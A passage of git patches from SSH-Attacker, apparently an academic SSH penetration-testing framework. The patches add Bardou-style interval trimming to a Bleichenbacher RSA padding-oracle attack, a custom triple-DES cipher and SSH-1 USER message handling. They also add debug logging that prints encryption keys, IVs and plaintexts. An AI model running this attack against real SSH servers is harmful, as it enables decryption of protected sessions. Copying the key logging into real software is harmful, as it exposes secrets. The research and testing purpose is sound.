ciphertext, innerPublicKey, outerPublicKey); @@ -589,7 +589,10 @@ private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { M.get(0).upper.toString(16)); BigInteger s = - find_smallest_s(ceil(publicKey.getModulus(), three_B), ciphertext, publicKey); + find_smallest_s( + ceil(publicKey.getModulus().add(two_B), three_B_sub_one), + ciphertext, + publicKey); LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", From 652d8540d5e965f23c5e433b8b528f24051d679d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Dec 2023 12:34:57 +0100 Subject: [PATCH 118/176] Implementing Bardou-Recommondations Trimming M0 --- .../attacks/pkcs1/Bleichenbacher.java | 188 +++++++++++++++++- 1 file changed, 186 insertions(+), 2 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 4194f7071..abacf7cb4 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -16,6 +16,8 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; +import java.util.stream.Collectors; +import java.util.stream.IntStream; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; @@ -528,9 +530,86 @@ private byte[] innerBleichenbacher( M.get(0).lower.toString(16), M.get(0).upper.toString(16)); + ArrayList trimmers = new ArrayList<>(); + for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { + if (t <= 50) { + for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { + if (BigInteger.valueOf(u).gcd(BigInteger.valueOf(t)).equals(BigInteger.ONE)) { + trimmers.add(new int[] {u, t}); + } + } + } else { // t > 50 + trimmers.add(new int[] {t - 1, t}); + trimmers.add(new int[] {t + 1, t}); + } + } + ArrayList utPairs = new ArrayList<>(); + + for (int[] ut : trimmers) { + int u = ut[0]; + int t = ut[1]; + + BigInteger uBI = BigInteger.valueOf(u); + BigInteger tBI = BigInteger.valueOf(t); + + BigInteger cipherbig = new BigInteger(1, ciphertext); + + BigInteger result = + cipherbig + .multiply( + (uBI.multiply(tBI.modInverse(innerPublicKey.getModulus()))) + .modPow( + innerPublicKey.getPublicExponent(), + innerPublicKey.getModulus())) + .mod(innerPublicKey.getModulus()); + + BigInteger encryptedAttempt = encryptBigInt(result, outerPublicKey); + + if (queryOracle( + encryptedAttempt, + true)) { // assuming the oracle and util method exists and does what expected + utPairs.add(new int[] {u, t}); + } + } + + if (!utPairs.isEmpty()) { + + ArrayList t_values = new ArrayList<>(); + for (int[] pair : utPairs) { + t_values.add(pair[1]); + } + + int t_prime = lcm_n(t_values); + + int u_min = Integer.MAX_VALUE; + int u_max = Integer.MIN_VALUE; + for (int[] pair : utPairs) { + int current = pair[0] * t_prime / pair[1]; + if (current < u_min) { + u_min = current; + } + if (current > u_max) { + u_max = current; + } + } + + BigInteger a = + two_B.multiply(BigInteger.valueOf(t_prime)).divide(BigInteger.valueOf(u_min)); + BigInteger b = + three_B_sub_one + .multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_max)); + + M = new ArrayList<>(); + M.add(new Interval(a, b)); + LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + } else { + LOGGER.debug("UT-Paris where empty"); + } + BigInteger s = find_smallest_s_nested( - ceil(innerPublicKey.getModulus().add(two_B), three_B_sub_one), + ceil(innerPublicKey.getModulus().add(two_B), M.get(0).lower), ciphertext, innerPublicKey, outerPublicKey); @@ -560,6 +639,36 @@ private byte[] innerBleichenbacher( } } + // Define the lcm method + public static int lcm(int a, int b) { + int tempA = a; + int tempB = b; + while (tempB != 0) { + int temp = tempB; + tempB = tempA % tempB; + tempA = temp; + } + return a * (b / tempA); + } + + // Define the lcm_n method + public static int lcm_n(ArrayList list) { + ArrayList ns = new ArrayList<>(list); + int log = (int) (Math.log(ns.size()) / Math.log(2) + 1); + for (int i = 0; i < log; i++) { + ArrayList finalNs = ns; + List nsNext = + IntStream.range(0, ns.size() / 2) + .mapToObj(k -> lcm(finalNs.get(2 * k), finalNs.get(2 * k + 1))) + .collect(Collectors.toList()); + if (ns.size() % 2 != 0) { + nsNext.add(ns.get(ns.size() - 1)); + } + ns = new ArrayList<>(nsNext); + } + return ns.get(0); + } + /** * The Bleichenbacher-Attacke for single-encrypted ciphertexts * @@ -588,9 +697,84 @@ private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { M.get(0).lower.toString(16), M.get(0).upper.toString(16)); + ArrayList trimmers = new ArrayList<>(); + for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { + if (t <= 50) { + for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { + if (BigInteger.valueOf(u).gcd(BigInteger.valueOf(t)).equals(BigInteger.ONE)) { + trimmers.add(new int[] {u, t}); + } + } + } else { // t > 50 + trimmers.add(new int[] {t - 1, t}); + trimmers.add(new int[] {t + 1, t}); + } + } + ArrayList utPairs = new ArrayList<>(); + + for (int[] ut : trimmers) { + int u = ut[0]; + int t = ut[1]; + + BigInteger uBI = BigInteger.valueOf(u); + BigInteger tBI = BigInteger.valueOf(t); + + BigInteger cipherbig = new BigInteger(1, ciphertext); + + BigInteger result = + cipherbig + .multiply( + (uBI.multiply(tBI.modInverse(publicKey.getModulus()))) + .modPow( + publicKey.getPublicExponent(), + publicKey.getModulus())) + .mod(publicKey.getModulus()); + + if (queryOracle( + result, + false)) { // assuming the oracle and util method exists and does what expected + utPairs.add(new int[] {u, t}); + } + } + + if (!utPairs.isEmpty()) { + + ArrayList t_values = new ArrayList<>(); + for (int[] pair : utPairs) { + t_values.add(pair[1]); + } + + int t_prime = lcm_n(t_values); + + int u_min = Integer.MAX_VALUE; + int u_max = Integer.MIN_VALUE; + for (int[] pair : utPairs) { + int current = pair[0] * t_prime / pair[1]; + if (current < u_min) { + u_min = current; + } + if (current > u_max) { + u_max = current; + } + } + + BigInteger a = + two_B.multiply(BigInteger.valueOf(t_prime)).divide(BigInteger.valueOf(u_min)); + BigInteger b = + three_B_sub_one + .multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_max)); + + M = new ArrayList<>(); + M.add(new Interval(a, b)); + LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + } else { + LOGGER.debug("UT-Paris where empty"); + } + BigInteger s = find_smallest_s( - ceil(publicKey.getModulus().add(two_B), three_B_sub_one), + ceil(publicKey.getModulus().add(two_B), M.get(0).lower), ciphertext, publicKey); From c8c1134c205f49dc802acb268ee427f6fb76baae Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 01:01:49 +0100 Subject: [PATCH 119/176] Implementing custom Trible-DES because it differs from java implemenation --- .../core/crypto/cipher/CipherFactory.java | 4 ++++ .../core/crypto/cipher/JavaCipher.java | 15 +++++++++++++++ .../sshattacker/core/layer/impl/SSH1Layer.java | 14 ++++++++++++++ .../core/packet/cipher/PacketSsh1Cipher.java | 9 +++++++++ .../core/packet/crypto/PacketDecryptor.java | 8 ++++++++ 5 files changed, 50 insertions(+) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java index 509c537fe..38c76e544 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/CipherFactory.java @@ -24,6 +24,7 @@ public static AbstractCipher getCipher(EncryptionAlgorithm encryptionAlgorithm, public static AbstractCipher getCipher( EncryptionAlgorithm encryptionAlgorithm, byte[] key, boolean mainCipher) { + LOGGER.info("Getting Cipher {}", encryptionAlgorithm.toString()); if (encryptionAlgorithm == EncryptionAlgorithm.NONE) { return new NoneCipher(); } else if (mainCipher @@ -31,6 +32,9 @@ public static AbstractCipher getCipher( // If mainCipher is not set, the factory will return a JavaCipher wrapping a ChaCha20 // instance used for header encryption / decryption return new ChaCha20Poly1305Cipher(key); + } else if (encryptionAlgorithm == EncryptionAlgorithm.TRIPLE_DES_CBC) { + LOGGER.info("Getting Cipher {}", encryptionAlgorithm.toString()); + return new TribleDESCipher(key); } else if (encryptionAlgorithm.getJavaName() != null) { return new JavaCipher( encryptionAlgorithm, diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/JavaCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/JavaCipher.java index e8a09318d..a4a269e8f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/JavaCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/JavaCipher.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.crypto.cipher; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithmFamily; import de.rub.nds.sshattacker.core.exceptions.CryptoException; @@ -20,9 +21,13 @@ import javax.crypto.spec.GCMParameterSpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; class JavaCipher extends AbstractCipher { + private static final Logger LOGGER = LogManager.getLogger(); + private final EncryptionAlgorithm algorithm; private final byte[] key; private final boolean keepCipherState; @@ -66,6 +71,8 @@ public byte[] encrypt(byte[] plainData) throws CryptoException { @Override public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { + LOGGER.debug("JAVA Cipher, key is: "); + LOGGER.debug(ArrayConverter.bytesToHexString(key)); IvParameterSpec encryptIv = new IvParameterSpec(iv); try { cipher = Cipher.getInstance(algorithm.getJavaName()); @@ -146,6 +153,14 @@ public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { cipher = Cipher.getInstance(algorithm.getJavaName()); String keySpecAlgorithm = EncryptionAlgorithmFamily.getFamilyForAlgorithm(algorithm).getJavaName(); + + LOGGER.debug( + "Decrypting with following data: cipher {},KeySpec {}, IV {}, key {}, ciphertext {}", + algorithm.getJavaName(), + keySpecAlgorithm, + ArrayConverter.bytesToHexString(decryptIv.getIV()), + ArrayConverter.bytesToHexString(key), + ArrayConverter.bytesToHexString(encryptedData)); cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key, keySpecAlgorithm), decryptIv); return cipher.doFinal(encryptedData); } catch (IllegalStateException diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 6a8a9724e..212208c78 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -248,6 +248,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); readDisconnectData((BinaryPacket) packet); break; + case SSH_CMSG_USER: + LOGGER.debug("[bro] returning SSH_CMSG_USER Hint"); + readUserData((BinaryPacket) packet); + break; case SSH_SMSG_PUBLIC_KEY: LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); readPublicKeyData((BinaryPacket) packet); @@ -326,6 +330,16 @@ private void readDisconnectData(AbstractPacket packet) { readContainerFromStream(message, context, temp_stream); } + private void readUserData(AbstractPacket packet) { + UserMessageSSH1 message = new UserMessageSSH1(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + private void readSuccessMessage(AbstractPacket packet) { SuccessMessageSSH1 message = new SuccessMessageSSH1(); HintedInputStream temp_stream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java index 2a5612824..18643c840 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java @@ -59,6 +59,7 @@ public PacketSsh1Cipher( mode == CipherMode.ENCRYPT ? keySet.getWriteIv(getLocalConnectionEndType()) : keySet.getReadIv(getLocalConnectionEndType()); + LOGGER.debug("nextIV is {}", nextIv); } } @@ -73,6 +74,8 @@ private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { @Override public void encrypt(BinaryPacketSSHv1 packet) { + LOGGER.debug("Encrypting the Packet now really"); + packet.setLength( packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum @@ -201,6 +204,7 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { iv = computations.getIv().getValue(); } LOGGER.info("Plain data to encrypt is {}", plainData); + LOGGER.debug("Encryption Cipher is {}", cipher.getAlgorithm()); packet.setCiphertext(cipher.encrypt(plainData, iv)); nextIv = extractNextIv(nextIv, packet.getCiphertext().getOriginalValue()); } else { @@ -376,18 +380,23 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { plainData = ArrayConverter.concatenate(firstBlock, remainingBlocks); } else { if (encryptionAlgorithm.getIVSize() > 0) { + LOGGER.debug("2a:"); // Case 2a: Binary packet / First block not decrypted / Cipher with IV computations.setIv(nextIv); + LOGGER.debug("iv is {}", nextIv); plainData = cipher.decrypt( packet.getCiphertext().getValue(), computations.getIv().getValue()); } else { + LOGGER.debug("2b:"); // Case 2b: Binary packet / First block not decrypted / Cipher without IV plainData = cipher.decrypt(packet.getCiphertext().getValue()); } } computations.setPlainPacketBytes(plainData); + LOGGER.debug("DEBUGGING NOW HIER {}", ArrayConverter.bytesToHexString(plainData)); + ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); packet.setPayload(plain_modifialbel); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java index dc7814845..6e79fe507 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.crypto; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; @@ -39,6 +40,9 @@ public PacketDecryptor(PacketCipher packetCipher, SshContext context) { public void decrypt(BinaryPacketSSHv1 packet) { PacketCipher packetCipher = getPacketMostRecentCipher(); LOGGER.debug("Decrypting binary packet using packet cipher: {}", packetCipher); + LOGGER.debug( + "Decrypting total {}", + ArrayConverter.bytesToHexString(packet.getCiphertext().getValue())); try { packet.setSequenceNumber(context.getReadSequenceNumber()); packetCipher.process(packet); @@ -50,6 +54,10 @@ public void decrypt(BinaryPacketSSHv1 packet) { LOGGER.error("Could not decrypt with " + noneCipher, ex); } } + + LOGGER.debug( + "resulting in {}", ArrayConverter.bytesToHexString(packet.getPayload().getValue())); + context.incrementReadSequenceNumber(); } From 670b9e4a8005ed5b3c2528d133e2a86c88f243f9 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 01:02:11 +0100 Subject: [PATCH 120/176] Implementing SSH_CMSG_USER --- .../core/crypto/cipher/TribleDESCipher.java | 131 ++++++++++++++++++ .../protocol/common/SshMessageParser.java | 2 +- .../ssh1/handler/UserMessageHandler.java | 28 ++++ .../ssh1/message/UserMessageSSH1.java | 63 +++++++++ .../ssh1/parser/UserMessageParser.java | 50 +++++++ .../preparator/UserMessagePreparator.java | 29 ++++ .../serializer/UserMessageSerializier.java | 37 +++++ .../core/workflow/action/MessageAction.java | 2 + .../core/workflow/action/ReceiveAction.java | 2 + 9 files changed, 343 insertions(+), 1 deletion(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/UserMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/UserMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/UserMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/UserMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/UserMessageSerializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java new file mode 100644 index 000000000..697ef9285 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java @@ -0,0 +1,131 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.crypto.cipher; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.EncryptionAlgorithm; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import java.security.InvalidAlgorithmParameterException; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import javax.crypto.*; +import javax.crypto.spec.IvParameterSpec; +import javax.crypto.spec.SecretKeySpec; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +class TribleDESCipher extends AbstractCipher { + + private static final Logger LOGGER = LogManager.getLogger(); + private final byte[] key1, key2, key3; + private final Cipher cipher1, cipher2, cipher3; + + public TribleDESCipher(byte[] key) { + + LOGGER.debug("Init with key {}", ArrayConverter.bytesToHexString(key)); + + this.key1 = new byte[8]; + this.key2 = new byte[8]; + this.key3 = new byte[8]; + + System.arraycopy(key, 0, this.key1, 0, 8); + System.arraycopy(key, 8, this.key2, 0, 8); + System.arraycopy(key, 16, this.key3, 0, 8); + + try { + this.cipher1 = Cipher.getInstance("DES/CBC/NoPadding"); + this.cipher2 = Cipher.getInstance("DES/CBC/NoPadding"); + this.cipher3 = Cipher.getInstance("DES/CBC/NoPadding"); + } catch (NoSuchAlgorithmException | NoSuchPaddingException e) { + throw new RuntimeException(e); + } + } + + @Override + public byte[] encrypt(byte[] plainData) throws CryptoException { + return encrypt(plainData, new byte[8]); + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { + LOGGER.info( + "Encrypting 3DES with data: {} with iv {}", + ArrayConverter.bytesToHexString(plainData), + iv); + IvParameterSpec decryptIv = new IvParameterSpec(iv); + try { + LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key1)); + LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key2)); + LOGGER.debug("Encryption with key {}", ArrayConverter.bytesToHexString(this.key3)); + + cipher1.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key1, "DES"), decryptIv); + cipher2.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key2, "DES"), decryptIv); + cipher3.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key3, "DES"), decryptIv); + + byte[] enc1 = cipher1.doFinal(plainData); + byte[] enc2 = cipher2.doFinal(enc1); + byte[] enc3 = cipher3.doFinal(enc2); + LOGGER.info("Resulting in encrypted ata: {}", ArrayConverter.bytesToHexString(enc3)); + return enc3; + + } catch (InvalidKeyException + | InvalidAlgorithmParameterException + | IllegalBlockSizeException + | BadPaddingException e) { + throw new RuntimeException(e); + } + } + + @Override + public byte[] encrypt(byte[] plainData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException { + throw new UnsupportedOperationException("TribleDES does not support Authentication"); + } + + @Override + public byte[] decrypt(byte[] encryptedData) throws CryptoException { + return decrypt(encryptedData, new byte[8]); + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { + IvParameterSpec decryptIv = new IvParameterSpec(iv); + LOGGER.info( + "Decrypting 3DES with data: {} with iv {}", + ArrayConverter.bytesToHexString(encryptedData), + iv); + try { + cipher1.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key3, "DES"), decryptIv); + cipher2.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key2, "DES"), decryptIv); + cipher3.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key1, "DES"), decryptIv); + + byte[] enc1 = cipher1.doFinal(encryptedData); + byte[] enc2 = cipher2.doFinal(enc1); + byte[] enc3 = cipher3.doFinal(enc2); + LOGGER.info("Resulting in decrypted data: {}", ArrayConverter.bytesToHexString(enc3)); + return enc3; + + } catch (InvalidKeyException + | InvalidAlgorithmParameterException + | IllegalBlockSizeException + | BadPaddingException e) { + throw new RuntimeException(e); + } + } + + @Override + public byte[] decrypt(byte[] encryptedData, byte[] iv, byte[] additionalAuthenticatedData) + throws CryptoException, AEADBadTagException { + throw new UnsupportedOperationException("TribleDES does not support Authentication"); + } + + @Override + public EncryptionAlgorithm getAlgorithm() { + return EncryptionAlgorithm.TRIPLE_DES_CBC; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java index 5675fdfe5..ebfb6c6bf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/SshMessageParser.java @@ -36,7 +36,7 @@ protected final void parseProtocolMessageContents(T message) { private void parseMessageID(T message) { message.setMessageId(parseByteField(SshMessageConstants.MESSAGE_ID_LENGTH)); - LOGGER.debug("Parsing MessageID {}", message.getMessageId()); + LOGGER.debug("Parsing MessageID {}", message.getMessageId().getValue()); } protected abstract void parseMessageSpecificContents(T message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/UserMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/UserMessageHandler.java new file mode 100644 index 000000000..4740f4378 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/UserMessageHandler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.UserMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class UserMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public UserMessageHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(UserMessageSSH1 message) { + LOGGER.warn("Recieved a User {}", message.getUsername().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/UserMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/UserMessageSSH1.java new file mode 100644 index 000000000..83523edbc --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/UserMessageSSH1.java @@ -0,0 +1,63 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.UserMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.UserMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.UserMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.UserMessageSerializier; +import java.io.InputStream; + +public class UserMessageSSH1 extends SshMessage { + + private ModifiableString username; + + public ModifiableString getUsername() { + return username; + } + + public void setUsername(ModifiableString username) { + this.username = username; + } + + public void setUsername(String username) { + this.username = ModifiableVariableFactory.safelySetValue(this.username, username); + } + + @Override + public UserMessageHandler getHandler(SshContext context) { + return new UserMessageHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new UserMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new UserMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new UserMessageSerializier(this); + } + + @Override + public String toShortString() { + return "USER"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/UserMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/UserMessageParser.java new file mode 100644 index 000000000..18a7d1996 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/UserMessageParser.java @@ -0,0 +1,50 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.UserMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class UserMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public UserMessageParser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseCRC(UserMessageSSH1 message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); + } + + private void parseUserName(UserMessageSSH1 message) { + LOGGER.debug("parse INT-Filed"); + int lenght = parseIntField(4); + LOGGER.debug("parse String of lenght {}", lenght); + String username = parseByteString(lenght); + message.setUsername(username); + LOGGER.debug("Username is {}", username); + } + + private void parseProtocolFlags(UserMessageSSH1 message) {} + + @Override + protected void parseMessageSpecificContents(UserMessageSSH1 message) { + parseUserName(message); + } + + @Override + public void parse(UserMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/UserMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/UserMessagePreparator.java new file mode 100644 index 000000000..80a6a692c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/UserMessagePreparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.UserMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class UserMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public UserMessagePreparator(Chooser chooser, UserMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_USER); + } + + @Override + public void prepareMessageSpecificContents() { + getObject().setUsername(chooser.getConfig().getUsername()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/UserMessageSerializier.java 